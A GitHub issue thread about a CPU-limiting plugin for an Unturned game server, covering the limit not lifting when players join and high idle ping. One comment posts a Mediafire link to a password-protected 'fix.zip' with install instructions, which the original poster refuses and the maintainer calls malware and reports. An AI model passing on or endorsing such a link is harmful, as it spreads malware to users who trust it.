### ISSUE TITLE
Fix player verification 

### ISSUE THREAD

**Issue by d3adwolf** [LeandroTheDev/cpu_limiter#1]
Hi, the implementation and idea is very cool, it worked for me even in LinuxGSM Docker container, but there are two issues that prevent me from using it in Production so far:

1. For some reason, when I go to the server, it does not remove the limit (although it checks every 15 seconds) and as a result I have a very high ping, well, and the zombies themselves lag.

2. At idle, when there are no players I was able to achieve a reduction in CPU load from 24% to 8% is very cool considering that I have 2 CPUs on 12 threads, 6 cores each, but if you look for servers through the Server List, they are not always shown, because there is a limit on high ping: above 300ms Unturned does not show, well, because of the fact that the servers at idle 200-290ms, instead of 15-35ms, they may not come thinking that the server has a bad network connectivity.

**Comment by d3adwolf** [comment]
In addition to the former, I'm using [RocketModFix](https://github.com/RocketModFix/RocketModFix) core, but it shouldn't affect custom events so much that I can't see players online.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by d3adwolf** [comment]
Thanks, I'll refuse, I don't trust archives with passwords, moreover I have Unix, I can't run a fucking .exe :D

**Comment by LeandroTheDev** [comment]
Probably i missed something in the player connection function so that is not disabling the cpulimiter, but for the latency i think its cannot be solved in this context, because the unturned server does not have any idle process, so when we force limiting the cpu to the process it will limit also the thread that connects to the steam servers, because it is embeed to the unturned game process (for some reason) making the server "Laggy"

i will try to find the error that is not disabling the cpu limit, also the comment above with mediafire download is 100% malware, i have deleted and reported.
